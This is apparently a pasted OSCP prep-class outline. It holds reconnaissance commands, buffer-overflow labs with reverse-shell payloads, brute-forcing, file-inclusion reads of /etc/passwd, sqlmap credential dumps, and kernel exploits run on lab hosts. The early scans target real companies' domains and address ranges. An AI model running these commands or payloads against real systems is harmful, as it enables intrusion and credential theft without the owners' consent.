Guest User

Untitled

a guest
Feb 27th, 2018
2,828
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 51.98 KB | None | 0 0
  1. OSCP Prep class
  2.  
  3.  
  4. Day 1: Exploit Research
  5. http://www.securitytube.net/groups?operation=view&groupId=7
  6.  
  7. Day 2: Python Hacking
  8. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (videos 1-10 if you are a complete beginner)
  9. https://www.youtube.com/playlist?list=PL1A2CSdiySGLtKwqBnqj9BON6QQjWkP4n (entire playlist)
  10.  
  11. #################################
  12. ----------- ############### # Day 1: Advanced Scanning Labs # ############### -----------
  13. #################################
  14.  
  15.  
  16. ---------------------------Type This-----------------------------------
  17. cd /home/strategicsec/toolz
  18.  
  19. wget https://dl.packetstormsecurity.net/UNIX/scanners/blindcrawl.pl
  20.  
  21. perl blindcrawl.pl -d motorola.com
  22. -----------------------------------------------------------------------
  23.  
  24.  
  25. -- Take each IP address and look ip up here:
  26. http://www.networksolutions.com/whois/index.jsp
  27.  
  28.  
  29. Zone Transfer fails on most domains, but here is an example of one that works:
  30. ---------------------------Type This-----------------------------------
  31. dig axfr heartinternet.co.uk @ns.heartinternet.co.uk
  32.  
  33.  
  34. cd ~/toolz/
  35.  
  36. wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
  37.  
  38. gcc ipcrawl.c -o ipcrawl
  39.  
  40. chmod 777 ipcrawl
  41.  
  42. ./ipcrawl 148.87.1.1 148.87.1.254
  43.  
  44.  
  45. sudo nmap -sL 148.87.1.0-255
  46. strategicsec
  47.  
  48.  
  49. sudo nmap -sL 148.87.1.0-255 | grep oracle
  50. strategicsec
  51. -----------------------------------------------------------------------
  52.  
  53.  
  54.  
  55.  
  56. ########################
  57. # Scanning Methodology #
  58. ########################
  59.  
  60. - Ping Sweep
  61. What's alive?
  62. ------------
  63. sudo nmap -sP 157.166.226.*
  64. strategicsec
  65.  
  66. -if -SP yields no results try:
  67. sudo nmap -sL 157.166.226.*
  68. strategicsec
  69.  
  70. -Look for hostnames:
  71. sudo nmap -sL 157.166.226.* | grep com
  72. strategicsec
  73.  
  74.  
  75. - Port Scan
  76. What's where?
  77. ------------
  78. sudo nmap -sS 162.243.126.247
  79. strategicsec
  80.  
  81.  
  82. - Bannergrab/Version Query
  83. What versions of software are running
  84. -------------------------------------
  85. sudo nmap -sV 162.243.126.247
  86. strategicsec
  87.  
  88.  
  89. - Vulnerability Research
  90. Lookup the banner versions for public exploits
  91. ----------------------------------------------
  92. http://exploit-db.com
  93. http://securityfocus.com/bid
  94. https://packetstormsecurity.com/files/tags/exploit/
  95.  
  96.  
  97.  
  98. ##############################
  99. # Scanning Process to follow #
  100. ##############################
  101. Step 1: Ping Sweep
  102. ------------------
  103. nmap -sP <IP-ADDRESS-RANGE>
  104. nmap -sL <IP-ADDRESS-RANGE>
  105.  
  106.  
  107. Step 2: Port Scan
  108. -----------------
  109. nmap -sS <IP-ADDRESS>
  110.  
  111.  
  112. Step 3: Bannergrab
  113. ------------------
  114. nmap -sV <IP-ADDRESS>
  115. nmap -sV -p- <IP-ADDRESS>
  116. |
  117. ----> Vulnerability Research
  118.  
  119.  
  120. Step 4: Vulnerability Scan the webservers
  121. -----------------------------------------
  122. git clone https://github.com/sullo/nikto.git Nikto2
  123.  
  124. cd Nikto2/program
  125.  
  126. perl nikto.pl -h <IP-ADDRESS>
  127.  
  128.  
  129.  
  130. Step 5: Directory Bruteforce
  131. --------------------
  132. git clone https://github.com/v0re/dirb.git
  133.  
  134. cd dirb/
  135.  
  136. ./configure
  137.  
  138. make
  139.  
  140. ./dirb
  141.  
  142. ./dirb http://<IP-ADDRESS> wordlists/big.txt
  143.  
  144.  
  145.  
  146.  
  147.  
  148. Step 6: Bruteforce any services you find
  149. ----------------------------------------
  150. root@kali:~# hydra -L username.txt -P passlist.txt ftp://<IP-ADDRESS
  151. root@kali:~# hydra -l user -P passlist.txt ftp://<IP-ADDRESS
  152.  
  153.  
  154.  
  155.  
  156.  
  157.  
  158. ##############################
  159. ----------- ############### # Day 2: Stack Overflow Labs # ############### -----------
  160. ##############################
  161.  
  162.  
  163.  
  164.  
  165.  
  166. #######################################
  167. # Download the class virtual machines #
  168. #######################################
  169.  
  170. You can download the Exploit Dev VMs from the links below:
  171. https://s3.amazonaws.com/infosecaddictsvirtualmachines/XPSP3-ED-Target.zip
  172. user: Administrator
  173. pass: strategicsec
  174.  
  175.  
  176. https://s3.amazonaws.com/infosecaddictsvirtualmachines/Strategicsec-XP-ED-Attack-Host.zip
  177. user: Administrator
  178. pass: strategicsec
  179.  
  180.  
  181.  
  182. https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
  183. username: workshop
  184. password: password
  185.  
  186.  
  187. Inside of your XP-ED-AttackHost VM please download this file and extract it to your Desktop:
  188. https://s3.amazonaws.com/StrategicSec-Files/ED-Workshop-Files.zip
  189.  
  190.  
  191.  
  192. #########################################
  193. # Download this file on your windows VM #
  194. #########################################
  195. https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
  196. https://s3.amazonaws.com/infosecaddictsfiles/SLmail5-5-Exploit.zip
  197.  
  198.  
  199.  
  200.  
  201. #####################################
  202. # Quick Stack Based Buffer Overflow #
  203. #####################################
  204.  
  205. - You can download everything you need for this exercise (except netcat) from the link below
  206. https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
  207.  
  208. - Extract this zip file to your Desktop
  209.  
  210. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  211.  
  212. - Open a new command prompt and type:
  213. nc localhost 9999
  214.  
  215. - In the new command prompt window where you ran nc type:
  216. HELP
  217.  
  218. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
  219. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  220.  
  221. - Now double-click on 1-simplefuzzer.py
  222. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  223.  
  224.  
  225. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  226.  
  227. - Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  228.  
  229. - Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  230.  
  231. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  232.  
  233. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  234.  
  235. - Calculate the distance to EIP by running script 3-3000chars.py
  236. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
  237.  
  238. 4-count-chars-to-EIP.py
  239. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
  240. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  241.  
  242. 5-2006char-eip-check.py
  243. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
  244.  
  245. 6-jmp-esp.py
  246. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  247.  
  248. 7-first-exploit
  249. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  250.  
  251. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
  252.  
  253.  
  254. ------------------------------
  255.  
  256. cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc
  257.  
  258. vi vulnserv.rb (paste the code into this file)
  259.  
  260.  
  261.  
  262. cd ~/toolz/metasploit
  263.  
  264. ./msfconsole
  265.  
  266.  
  267.  
  268. use exploit/windows/misc/vulnserv
  269. set PAYLOAD windows/meterpreter/bind_tcp
  270. set RHOST 192.168.88.129
  271. set RPORT 9999
  272. exploit
  273.  
  274. ---------------------------------------------------------------------
  275. Day 1 Challenge:
  276.  
  277. Write an exploit for FreeFloat FTP - make sure that it is broken up into multiple scripts like the vulnserver exploit is.
  278. https://www.exploit-db.com/apps/687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver.zip
  279.  
  280.  
  281. Reference scripts for FreeFloat FTP:
  282. https://www.exploit-db.com/exploits/40711/
  283. https://www.exploit-db.com/exploits/40681/
  284. https://www.exploit-db.com/exploits/40677/
  285. https://www.exploit-db.com/exploits/40674/
  286. https://www.exploit-db.com/exploits/40673/
  287. https://www.exploit-db.com/exploits/40672/
  288. https://www.exploit-db.com/exploits/24479/
  289.  
  290.  
  291.  
  292.  
  293. ##################
  294. # Linux Exploits #
  295. ##################
  296.  
  297. The target virtual machine for these labs can be downloaded from here:
  298. https://s3.amazonaws.com/infosecaddictsvirtualmachines/asterisk.zip
  299. root: exploitlab
  300. user: exploitlab
  301. pass: exploitlab
  302.  
  303.  
  304.  
  305. The attack scripts can be downloaded from here:
  306. https://s3.amazonaws.com/secureninja/files/peercast_skel.zip
  307. https://s3.amazonaws.com/secureninja/files/dproxy.zip
  308. https://s3.amazonaws.com/secureninja/files/asterisk.zip
  309.  
  310.  
  311. ######################################
  312. # Lab 1: Simple Linux Stack Overflow #
  313. ######################################
  314. Login to the asterisk VM with the username/password of (exploitlab/exploitlab)
  315.  
  316. ---------------------------Type This-----------------------------------
  317.  
  318. cat victim1.c
  319. gcc victim1.c -o victim1
  320. ./victim AAAAAAAAAAAAAAAAAAA
  321. ./victim AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  322.  
  323.  
  324.  
  325. gdb -core core.xxxx
  326. info registers
  327. x/64x $esp
  328. quit
  329.  
  330.  
  331. /usr/local/sbin/peercast
  332.  
  333. -open peercast1.py on the XP attack-
  334. python peercast1.py | nc asterisk-vm-ip 7144
  335.  
  336. gdb -core core.xxxx
  337. info registers
  338. x/64x $esp
  339. quit
  340.  
  341.  
  342.  
  343. /usr/local/sbin/peercast
  344.  
  345. -open peercast2.py-
  346. python peercast2.py | nc asterisk-vm-ip 7144
  347.  
  348. gdb -core core.xxxx
  349. info registers
  350. x/64x $esp
  351. quit
  352.  
  353.  
  354.  
  355.  
  356.  
  357. - SSH into the Ubuntu Host (strategicsec:strategicsec) -
  358. cd /home/strategicsec/toolz/metasploit/tools/exploit
  359.  
  360. Now we will run the pattern offset with ruby:
  361.  
  362. ruby pattern_offset.rb 42306142
  363.  
  364. and
  365.  
  366. ruby pattern_offset.rb 61423161
  367. -----------------------------------------------------------------------
  368.  
  369. Distance to EIP is 780
  370. Relative position of ESP 784
  371.  
  372. Now to find a good JMP ESP address with msfelfscan
  373.  
  374. ---------------------------Type This-----------------------------------
  375.  
  376. cd /home/strategicsec/toolz/metasploit/
  377. ./msfelfscan -j ESP binaries/peercast_binary
  378. -----------------------------------------------------------------------
  379.  
  380. 0x0808fb57 jmp esp <----- we will use this one!
  381. 0x0808fcc7 jmp esp
  382. 0x0808ffff jmp esp
  383. 0x08090057 jmp esp <----- we can't use this one.
  384. 0x080901df jmp esp
  385.  
  386.  
  387. Now open and edit peercast3.py in notepad++ on our XP Host machine.
  388. pad_lenth = the distance to EIP
  389. ret_address = the jmp esp we are using
  390.  
  391. ---------------------------Type This-----------------------------------
  392.  
  393. python peercast3.py | nc asterisk-vm-ip 7144
  394.  
  395. gdb -core core.xxxx
  396. info registers
  397. x/64x $eip
  398. x/10i $eip
  399. quit
  400. -----------------------------------------------------------------------
  401.  
  402. Open peercast4.py in Notepad++ and replace the \xCC with our msf shellcode
  403.  
  404. Linux IA32 Reverse Shell
  405. LHOST (Listening Host) – the IP of your XP host machine ipconfig /all
  406. LPORT (Listening Port) – chose a port to run your listener on
  407. Encoder: Alpha2
  408.  
  409. ---------------------------Type This-----------------------------------
  410.  
  411. nc -l -p 4321
  412. python peercast4.py | nc asterisk-vm-ip 7144
  413. -----------------------------------------------------------------------
  414.  
  415.  
  416. ###########################
  417. ----------- ############### # Day 3: Attack Lab Hosts # ############### -----------
  418. ###########################
  419.  
  420.  
  421.  
  422. #########################
  423. # Class Virtual Machine #
  424. #########################
  425.  
  426.  
  427. Here is the VMWare virtual machine for the class or you can use Kali Linux as well if you like:
  428.  
  429. https://s3.amazonaws.com/infosecaddictsvirtualmachines/Ubuntu-17-10-InfoSecAddictsVM.zip
  430. user: infosecaddicts
  431. pass: infosecaddicts
  432.  
  433.  
  434. Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack.
  435.  
  436.  
  437. To connect to the VPN open a web browser on your host machine (not your virtual machine) and go to the following URL:
  438. https://54.245.178.32/?src=connect
  439.  
  440.  
  441. Accept the security exception and enter one of the following user names:
  442.  
  443. username: labuser001
  444. username: labuser002
  445. username: labuser003
  446. username: labuser004
  447. username: labuser005
  448. username: labuser006
  449. username: labuser007
  450. username: labuser008
  451. username: labuser009
  452. username: labuser010
  453. username: labuser011
  454. username: labuser012
  455. username: labuser013
  456. username: labuser014
  457. username: labuser015
  458. username: labuser016
  459. username: labuser017
  460. username: labuser018
  461. username: labuser019
  462. username: labuser020
  463.  
  464. ----------------------------------------------------------------------------------------------------------------------------------------
  465.  
  466. Mr. McCray will provide you with the password for the usernames above once the training session starts.
  467.  
  468.  
  469.  
  470.  
  471. The target network range is:
  472. 172.31.2.0/24
  473.  
  474.  
  475. You can do any attack EXCEPT man-in-the-middle attacks, and please DO NOT attack any other IP ranges.
  476.  
  477.  
  478.  
  479.  
  480.  
  481.  
  482.  
  483.  
  484.  
  485.  
  486. ----------------------------------------------------------------------------------------------------------------------------------------
  487. Some tools to install:
  488. ---------------------------Type This-----------------------------------
  489. wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
  490. gcc propecia.c -o propecia
  491. sudo cp propecia /bin
  492. -----------------------------------------------------------------------
  493.  
  494.  
  495.  
  496.  
  497.  
  498. Step 1: Portscan the server
  499. ---------------------------Type This-----------------------------------
  500. sudo nmap -sS 172.31.2.139
  501. -----------------------------------------------------------------------
  502.  
  503. Step 2: Version scan the server
  504. ---------------------------Type This-----------------------------------
  505. sudo nmap -sV -p22,80 172.31.2.139
  506. -----------------------------------------------------------------------
  507.  
  508.  
  509.  
  510. Step 3: Vulnerability scan the webserver
  511. ---------------------------Type This-----------------------------------
  512. cd ~/toolz/
  513.  
  514. rm -rf nikto*
  515.  
  516. git clone https://github.com/sullo/nikto.git Nikto2
  517.  
  518. cd Nikto2/program
  519.  
  520. perl nikto.pl -h 172.31.2.139
  521. -----------------------------------------------------------------------
  522.  
  523.  
  524.  
  525.  
  526. Step 4: Directory brute-force the webserver
  527. ---------------------------Type This-----------------------------------
  528. cd ~/toolz
  529.  
  530. git clone https://github.com/v0re/dirb.git
  531.  
  532. cd dirb/
  533.  
  534. ./configure
  535.  
  536. make
  537.  
  538. dirb
  539.  
  540. ./dirb http://172.31.2.139 wordlists/big.txt
  541. -----------------------------------------------------------------------
  542.  
  543.  
  544.  
  545.  
  546.  
  547.  
  548.  
  549.  
  550.  
  551.  
  552.  
  553.  
  554.  
  555. ----------------------------------------------------------------------------------------------------------------------------------------------
  556.  
  557.  
  558.  
  559.  
  560.  
  561.  
  562. Attack steps:
  563. -------------
  564.  
  565.  
  566. Step 1: Ping sweep the target network
  567. -------------------------------------
  568.  
  569.  
  570. ---------------------------Type This-----------------------------------
  571. nmap -sP 172.31.2.0/24
  572. -----------------------------------------------------------------------
  573.  
  574. Found 4 hosts:
  575. 172.31.2.47
  576. 172.31.2.47
  577. 172.31.2.157
  578. 172.31.2.217
  579.  
  580.  
  581. Step 2: Port scan target system
  582. -------------------------------
  583.  
  584.  
  585. ---------------------------Type This-----------------------------------
  586. sudo nmap -sV 172.31.2.47
  587. -----------------------------------------------------------------------
  588.  
  589.  
  590.  
  591. PORT STATE SERVICE VERSION
  592. 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
  593. 80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
  594. 514/tcp filtered shell
  595. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  596.  
  597.  
  598.  
  599. Step 3: Vulnerability Scan the webserver
  600. ----------------------------------------
  601.  
  602.  
  603. ---------------------------Type This-----------------------------------
  604. cd ~/toolz/
  605.  
  606. rm -rf nikto*
  607.  
  608. git clone https://github.com/sullo/nikto.git Nikto2
  609.  
  610. cd Nikto2/program
  611.  
  612. perl nikto.pl -h 172.31.2.47
  613. -----------------------------------------------------------------------
  614.  
  615.  
  616. Step 4: Run dirbuster or similar directory bruteforce tool against the target
  617. -----------------------------------------------------------------------------
  618.  
  619.  
  620. ---------------------------Type This-----------------------------------
  621. wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
  622.  
  623. perl Webr00t.pl -h 172.31.2.47 -v | grep -v "404 Not Found"
  624. -----------------------------------------------------------------------
  625.  
  626.  
  627.  
  628. Step 5: Browse the web site to look for clues
  629. ---------------------------------------------
  630. Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
  631.  
  632.  
  633. http://172.31.2.47/test
  634. http://172.31.2.47/test.php (got the following error message)
  635. 'file' parameter is empty. Please provide file path in 'file' parameter
  636.  
  637. Figured this was a Local File Include (LFI) so I tried:
  638. http://172.31.2.47/test.php?file=/etc/passwd
  639. http://172.31.2.47/test.php?file=/etc/passwd%00
  640.  
  641. None of these worked so I tried it as a POST request with curl (reference: https://pastebin.com/yfBz5H7b)
  642. ---------------------------Type This-----------------------------------
  643. curl -X POST -F 'file=/etc/passwd' http://172.31.2.47/test.php
  644. -----------------------------------------------------------------------
  645.  
  646.  
  647.  
  648. http://172.31.2.47/a
  649. http://172.31.2.47/b
  650. http://172.31.2.47/c (a and b gave 404 errors, but "c" is a blank page, and view source is blank as well - this must be a config file"
  651.  
  652. So let's try that POST request with curl to pull down the c.php config file.
  653.  
  654. ---------------------------Type This-----------------------------------
  655. curl -X POST -F 'file=/var/www/html/c.php' http://172.31.2.47/test.php
  656. curl -X POST -F 'file=/var/htdocs/c.php' http://172.31.2.47/test.php
  657. curl -X POST -F 'file=/var/www/c.php' http://172.31.2.47/test.php
  658. -----------------------------------------------------------------------
  659.  
  660. <?php
  661. #header( 'Z-Powered-By:its chutiyapa xD' );
  662. header('X-Frame-Options: SAMEORIGIN');
  663. header( 'Server:testing only' );
  664. header( 'X-Powered-By:testing only' );
  665.  
  666. ini_set( 'session.cookie_httponly', 1 );
  667.  
  668. $conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
  669.  
  670. // Check connection
  671. if (mysqli_connect_errno())
  672. {
  673. echo "connection failed -> " . mysqli_connect_error();
  674. }
  675.  
  676. ?>
  677.  
  678.  
  679.  
  680. ---------------------------Type This-----------------------------------
  681. ssh -l billu 172.31.2.47
  682. b0x_billu
  683. -----------------------------------------------------------------------
  684.  
  685.  
  686.  
  687. http://172.31.2.47/phpmyadmin
  688. http://172.31.2.47/phpMyAdmin
  689. http://172.31.2.47/pma
  690. http://172.31.2.47/phpmy
  691.  
  692.  
  693. Then I Googled config file name for phpmyadmin (config.inc.php)
  694.  
  695. ---------------------------Type This-----------------------------------
  696. curl -X POST -F 'file=/var/www/phpmy/config.inc.php' http://172.31.2.47/test.php
  697. -----------------------------------------------------------------------
  698. <?php
  699.  
  700. /* Servers configuration */
  701. $i = 0;
  702.  
  703. /* Server: localhost [1] */
  704. $i++;
  705. $cfg['Servers'][$i]['verbose'] = 'localhost';
  706. $cfg['Servers'][$i]['host'] = 'localhost';
  707. $cfg['Servers'][$i]['port'] = '';
  708. $cfg['Servers'][$i]['socket'] = '';
  709. $cfg['Servers'][$i]['connect_type'] = 'tcp';
  710. $cfg['Servers'][$i]['extension'] = 'mysqli';
  711. $cfg['Servers'][$i]['auth_type'] = 'cookie';
  712. $cfg['Servers'][$i]['user'] = 'root';
  713. $cfg['Servers'][$i]['password'] = 'roottoor';
  714. $cfg['Servers'][$i]['AllowNoPassword'] = true;
  715.  
  716.  
  717. ---------------------------Type This-----------------------------------
  718. ssh -l root 172.31.2.47
  719. roottoor
  720. -----------------------------------------------------------------------
  721.  
  722.  
  723.  
  724.  
  725.  
  726.  
  727. ---------------------------------------------------------------------------------------------------------------------------------------------------------
  728.  
  729. Attack steps:
  730. -------------
  731.  
  732.  
  733.  
  734. Step 1: Ping sweep the target network
  735. -------------------------------------
  736.  
  737.  
  738. ---------------------------Type This-----------------------------------
  739. nmap -sP 172.31.2.0/24
  740. -----------------------------------------------------------------------
  741.  
  742.  
  743.  
  744. - Found 3 hosts
  745. 172.31.2.64
  746. 172.31.2.217
  747. 172.31.2.238
  748.  
  749.  
  750.  
  751. Step 2: Port scan target system
  752. -------------------------------
  753.  
  754.  
  755. ---------------------------Type This-----------------------------------
  756. nmap -sV 172.31.2.64
  757. -----------------------------------------------------------------------
  758.  
  759.  
  760.  
  761. -------------Scan Results--------------------------------------------
  762. PORT STATE SERVICE VERSION
  763. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
  764. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  765. 514/tcp filtered shell
  766. 1037/tcp filtered ams
  767. 6667/tcp open irc ngircd
  768. Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  769. --------------------------------------------------------------------
  770.  
  771.  
  772. Step 3: Vulnerability Scan the webserver
  773. ----------------------------------------
  774.  
  775.  
  776. ---------------------------Type This-----------------------------------
  777. cd ~/toolz/
  778.  
  779. rm -rf nikto*
  780.  
  781. git clone https://github.com/sullo/nikto.git Nikto2
  782.  
  783. cd Nikto2/program
  784.  
  785. perl nikto.pl -h 172.31.2.64
  786. -----------------------------------------------------------------------
  787.  
  788.  
  789. Step 4: Run dirbuster or similar directory bruteforce tool against the target
  790. -----------------------------------------------------------------------------
  791.  
  792.  
  793. ---------------------------Type This-----------------------------------
  794. wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
  795.  
  796. perl Webr00t.pl -h 172.31.2.64 -v
  797. -----------------------------------------------------------------------
  798.  
  799.  
  800.  
  801. Step 5: Browse the web site to look for clues
  802. ---------------------------------------------
  803. Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
  804.  
  805.  
  806. ..... really didn't get much from here so we just opened the web page in a browser
  807. http://172.31.2.64/
  808.  
  809. .....browsed to the webpage and saw that it pointed to:
  810. http://172.31.2.64/jabc
  811.  
  812. ....clicked on documentation link and found hidden text that pointed to here:
  813. http://172.31.2.64/jabcd0cs/
  814.  
  815. ....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
  816. https://www.exploit-db.com/exploits/32075/
  817.  
  818. Tried the sql injection described in exploit-db:
  819. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
  820.  
  821. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
  822.  
  823.  
  824.  
  825. Tried to run sqlmap against the target
  826.  
  827.  
  828. ---------------------------Type This-----------------------------------
  829. cd sqlmap-dev/
  830. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql
  831.  
  832. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql
  833.  
  834. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql
  835.  
  836. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql
  837.  
  838. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
  839. -----------------------------------------------------------------------
  840.  
  841.  
  842.  
  843. FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
  844. FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net
  845.  
  846.  
  847.  
  848. ---------------------------Type This-----------------------------------
  849. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql
  850.  
  851. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
  852. -----------------------------------------------------------------------
  853.  
  854. username: webmin
  855. hash: b78aae356709f8c31118ea613980954b
  856.  
  857. https://hashkiller.co.uk/md5-decrypter.aspx
  858.  
  859. hash: b78aae356709f8c31118ea613980954b
  860. pass: webmin1980
  861.  
  862.  
  863. ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.
  864.  
  865.  
  866.  
  867. ---------------------------Type This-----------------------------------
  868. ssh -l webmin 172.31.2.64
  869. webmin1980
  870.  
  871. id
  872.  
  873. cat /etc/*release
  874. -----------------------------------------------------------------------
  875.  
  876.  
  877.  
  878. ....tired of not having a real command shell...
  879.  
  880.  
  881. ---------------------------Type This-----------------------------------
  882. python -c 'import pty;pty.spawn("/bin/bash")'
  883.  
  884.  
  885. cd /tmp
  886.  
  887. pwd
  888.  
  889.  
  890. cat >> exploit.c << out
  891.  
  892. **************paste in the content from here *****************
  893. https://www.exploit-db.com/raw/39166/
  894.  
  895.  
  896. ------ hit enter a few times ------
  897.  
  898. ------ then type 'out' ----- this closes the file handle...
  899.  
  900.  
  901.  
  902. ---------------------------Type This-----------------------------------
  903. gcc -o boom exploit.c
  904.  
  905. ./boom
  906. -----------------------------------------------------------------------
  907.  
  908.  
  909. ------------exploit failed, damn let's try another one ---------
  910.  
  911.  
  912.  
  913. ---------------------------Type This-----------------------------------
  914. cat >> exploit2.c << out
  915.  
  916. **************paste in the content from here *****************
  917. https://www.exploit-db.com/raw/37292/
  918.  
  919.  
  920. out
  921.  
  922.  
  923. gcc -o boom2 exploit2.c
  924.  
  925. ./boom2
  926.  
  927. id
  928.  
  929.  
  930. ......YEAH - do the happy dance!!!!
  931.  
  932.  
  933.  
  934.  
  935. ---- Previous class attack process -------
  936.  
  937.  
  938. #########################
  939. # Building a quick list #
  940. #########################
  941.  
  942. ---------------------------Type This-----------------------------------
  943.  
  944. cd ~
  945. echo bob >> list.txt
  946. echo jim >> list.txt
  947. echo joe >> list.txt
  948. echo tim >> list.txt
  949. echo admin >> list.txt
  950. echo hello >> list.txt
  951. echo rob >> list.txt
  952. echo test >> list.txt
  953. echo aaaaaa >> list.txt
  954. echo larry >> list.txt
  955. echo mario >> list.txt
  956. echo jason >> list.txt
  957. echo john >> list.txt
  958. -----------------------------------------------------------------------
  959.  
  960.  
  961. ###########################################################
  962. # Let's start with some basic scanning of the lab network #
  963. ###########################################################
  964.  
  965. ---------------------------Type This-----------------------------------
  966.  
  967. infosecaddicts@ubuntu:~$ nmap -sP 172.31.2.0/24
  968. -----------------------------------------------------------------------
  969.  
  970. Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:17 EST
  971. Nmap scan report for 172.31.2.24
  972. Host is up (0.046s latency).
  973. Nmap scan report for 172.31.2.47
  974. Host is up (0.045s latency).
  975. Nmap scan report for 172.31.2.64
  976. Host is up (0.037s latency).
  977. Nmap scan report for 172.31.2.86
  978. Host is up (0.040s latency).
  979. Nmap scan report for 172.31.2.117
  980. Host is up (0.038s latency).
  981. Nmap scan report for 172.31.2.139
  982. Host is up (0.037s latency).
  983. Nmap scan report for 172.31.2.157
  984. Host is up (0.036s latency).
  985. Nmap scan report for 172.31.2.217
  986. Host is up (0.047s latency).
  987. Nmap scan report for 172.31.2.238
  988. Host is up (0.036s latency).
  989. Nmap done: 256 IP addresses (9 hosts up) scanned in 3.22 seconds
  990.  
  991.  
  992.  
  993.  
  994.  
  995.  
  996. ---------------------------Type This-----------------------------------
  997.  
  998. infosecaddicts@ubuntu:~$ sudo nmap -sS 172.31.2.24
  999. -----------------------------------------------------------------------
  1000.  
  1001. [sudo] password for infosecaddicts:
  1002.  
  1003. Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:18 EST
  1004. Nmap scan report for 172.31.2.24
  1005. Host is up (1.8s latency).
  1006. Not shown: 989 closed ports
  1007. PORT STATE SERVICE
  1008. 25/tcp open smtp
  1009. 80/tcp open http
  1010. 111/tcp open rpcbind
  1011. 139/tcp open netbios-ssn
  1012. 445/tcp open microsoft-ds
  1013. 514/tcp filtered shell
  1014. 1322/tcp open novation
  1015. 2049/tcp open nfs
  1016. 8080/tcp open http-proxy
  1017. 8081/tcp open blackice-icecap
  1018. 9000/tcp open cslistener
  1019.  
  1020. Nmap done: 1 IP address (1 host up) scanned in 133.56 seconds
  1021.  
  1022.  
  1023.  
  1024.  
  1025.  
  1026.  
  1027.  
  1028. ---------------------------Type This-----------------------------------
  1029.  
  1030. infosecaddicts@ubuntu:~$ sudo nmap -sV -p25,80,111,139,445,1322,2049,8080,8081,9000 172.31.2.24
  1031. -----------------------------------------------------------------------
  1032.  
  1033. Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:21 EST
  1034. Nmap scan report for 172.31.2.24
  1035. Host is up (0.031s latency).
  1036. PORT STATE SERVICE VERSION
